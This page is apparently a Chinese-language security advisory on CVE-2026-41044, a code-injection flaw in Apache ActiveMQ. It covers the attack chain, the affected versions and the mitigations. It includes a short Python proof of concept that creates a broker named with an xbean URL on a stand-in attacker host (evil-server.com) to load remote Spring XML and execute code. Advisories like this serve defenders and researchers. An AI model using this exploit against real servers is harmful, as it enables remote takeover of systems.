IPBUF安全漏洞报告
English
CVE-2026-41044 CVSS 8.8 高危

CVE-2026-41044 Apache ActiveMQ 代码注入漏洞

披露日期: 2026-04-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41044
漏洞类型
代码注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Apache ActiveMQ

相关标签

RCE代码注入Apache ActiveMQSpring XMLCVE-2026-41044

漏洞概述

Apache ActiveMQ存在代码注入漏洞。攻击者可利用admin web console绕过名称验证构造恶意broker名称,通过DestinationView mbean触发VM transport加载远程Spring XML文件,导致在服务器端JVM执行任意代码。

技术细节

该漏洞源于Apache ActiveMQ在处理broker名称时存在输入验证缺陷。攻击者首先需要拥有低权限账户并访问admin web console。利用时,攻击者构造一个包含xbean绑定的恶意broker名称(如xbean:http://attacker.com/poc.xml),该名称能绕过验证。随后,攻击者利用DestinationView mbean发送消息,触发引用该恶意名称的VM transport创建。由于Spring的ResourceXmlApplicationContext会在BrokerService验证配置前实例化单例bean,恶意XML中的Runtime.exec()等代码将被执行,从而实现远程代码控制。

攻击链分析

STEP 1
步骤1:侦察与认证
攻击者识别目标Apache ActiveMQ服务,并获取有效的低权限账户凭据以访问admin web console。
STEP 2
步骤2:构造恶意Broker
攻击者利用控制台创建一个新的Broker,在名称字段中注入包含xbean绑定的字符串(如xbean:http://evil.com/poc.xml),绕过输入验证。
STEP 3
步骤3:触发加载
攻击者通过DestinationView Mbean发送消息或执行操作,触发引用该恶意名称的VM transport连接器的创建。
STEP 4
步骤4:代码执行
Spring框架尝试加载远程XML上下文文件,并在BrokerService验证配置前实例化单例bean,导致XML中定义的任意代码(如Runtime.exec)在服务器JVM中执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Conceptual PoC for CVE-2026-41044 # Requirements: Valid low-privilege credentials, Apache ActiveMQ instance target_url = "http://target-ip:8161" username = "low_priv_user" password = "password" session = requests.Session() session.auth = (username, password) # Step 1: Create a broker with a malicious name containing xbean binding # This bypasses name validation and points to a remote Spring XML file malicious_broker_name = "xbean:http://evil-server.com/shell.xml" create_broker_payload = { "name": malicious_broker_name, "create": "Create" } try: # Endpoint might vary based on version, usually /admin/brokers.jsp or similar response = session.post(f"{target_url}/admin/brokers.jsp", data=create_broker_payload) if response.status_code == 200: print("[+] Malicious broker created successfully.") # Step 2: Trigger the vulnerability via DestinationView MBean # Sending a message or invoking an operation that forces the VM transport to start # This causes the loading of the remote Spring XML context trigger_payload = { "JMSDestination": "queue://TriggerQueue", "body": "RCE Trigger" } session.post(f"{target_url}/admin/send.jsp", data=trigger_payload) print("[+] Trigger sent. Check your listener for callback.") except Exception as e: print(f"[-] Exploit failed: {e}")

影响范围

Apache ActiveMQ < 5.19.6
Apache ActiveMQ >= 6.0.0, < 6.2.5

防御指南

临时缓解措施
建议尽快升级至修复版本。如暂时无法升级,应通过防火墙限制管理后台的访问来源,并加强对创建Broker名称的监控,及时发现包含异常xbean绑定的请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表